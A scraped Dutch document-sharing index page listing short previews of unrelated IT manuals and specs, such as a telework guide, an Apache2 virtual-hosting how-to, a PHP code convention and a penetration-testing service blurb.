Fleet Pack Scan2FleetPack Inhoudsopgave INHOUDSOPGAVE... 1 WAAROM SCAN2FLEETPACK?... 1 INSTALLATIE... 2 DOWNLOADEN... 2 CONFIGURATIE... 4 GEBRUIK... 5 Het programma openen... 5 Inscannen en uploaden...
Nadere informatieINSTALLATIE EXCHANGE CONNECTOR
HANDLEIDING INSTALLATIE EXCHANGE CONNECTOR INSTALLATIE EXCHANGE CONNECTOR 0 0 HANDLEIDING INSTALLATIE EXCHANGE CONNECTOR INSTALLATIE EXCHANGE CONNECTOR HANDLEIDING datum: 10-08-2018 1 Inleiding... 1 2
Nadere informatieICT HANDLEIDING TELEWERKEN. Versie 2010
ICT HANDLEIDING TELEWERKEN Versie 2010 Inhoudsopgave 1 TELEWERKEN GEBRUIKEN... 3 1.1 DE YMERE PORTAL... 3 2 SOFTWARE INSTALLEREN... 5 2.1 CITRIX CLIËNT SOFTWARE... 5 3 YPORTAL AANPASSEN NAAR PERSOONLIJKE
Nadere informatieSoftware Requirements Specification
Software Requirements Specification PEN: Paper Exchange Network Software Engineering groep 1 (se1-1415) Academiejaar 2014-2015 Jens Nevens - Sander Lenaerts - Nassim Versbraegen Jo De Neve - Jasper Bevernage
Nadere informatieVersie 0.2. Documentatie Onsweb Club plugin voor NHV verenigingen. Laatste wijziging: 10 mei 2013 Auteurs: Marien Dongstra, Sebastian Huisman
Documentatie Onsweb Club plugin voor NHV verenigingen Versie 0.2 Laatste wijziging: 10 mei 2013 Auteurs: Marien Dongstra, Sebastian Huisman Alle rechten in dit document zijn voorbehouden. www.onsweb.nl,
Nadere informatieICT HANDLEIDING TELEWERKEN. Versie 2010
ICT HANDLEIDING TELEWERKEN Versie 2010 Inhoudsopgave 1 TELEWERKEN GEBRUIKEN...3 1.1 DE YMERE PORTAL...3 2 SOFTWARE INSTALLEREN...5 2.1 CITRIX CLIËNT SOFTWARE...5 3 YPORTAL AANPASSEN NAAR PERSOONLIJKE WENSEN...8
Nadere informatieInhoud. Pagina 2 van 13
Code Conventie Inhoud PHP algemeen... 3 Namen van variabelen... 3 Enkele of dubbele aanhalingstekens... 3 Globale variabelen... 3 Namen van functies... 3 Argumenten van functies... 3 Formattering... 4
Nadere informatieInstalleer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen
Installeer Apache2: Deze howto gaat over name based virtual hosting onder Apache 2.x., en is getest onder OpenSUSE 11 maar is in feite ook van toepassing op de andere distributies. Alleen Debian en afgeleide
Nadere informatieExterne pagina s integreren in InSite en OutSite
Externe pagina s integreren in InSite en OutSite Document-versie: 1.1 Datum: 04-10-2013 2013 AFAS Software Leusden Niets uit deze uitgave mag verveelvoudigd worden en/of openbaar gemaakt worden door middel
Nadere informatieISSX, Experts in IT Security. Wat is een penetratietest?
De Stuwdam 14/B, 3815 KM Amersfoort Tel: +31 33 4779529, Email: info@issx.nl Aanval- en penetratietest U heeft beveiligingstechnieken geïnstalleerd zoals Firewalls, Intrusion detection/protection, en encryptie
Nadere informatieMULTIFUNCTIONELE DIGITALE SYSTEMEN. Windows Server 2003, Server 2008 & Scan-to-file
MULTIFUNCTIONELE DIGITALE SYSTEMEN Windows Server 2003, Server 2008 & Scan-to-file Waarschuwing Dit document is bedoeld voor systeembeheerders. Het wordt aanbevolen een back-up te maken alvorens wijziging(en)
Nadere informatieFormulieren maken met Dreamweaver CS 4
Formulieren maken met Dreamweaver CS 4 In deze handleiding leer je om een formulier en elementen die je binnen een formulier kunt gebruiken, te ontwerpen met Dreamweaver. Het uitgangspunt is dat dit zoveel
Nadere informatie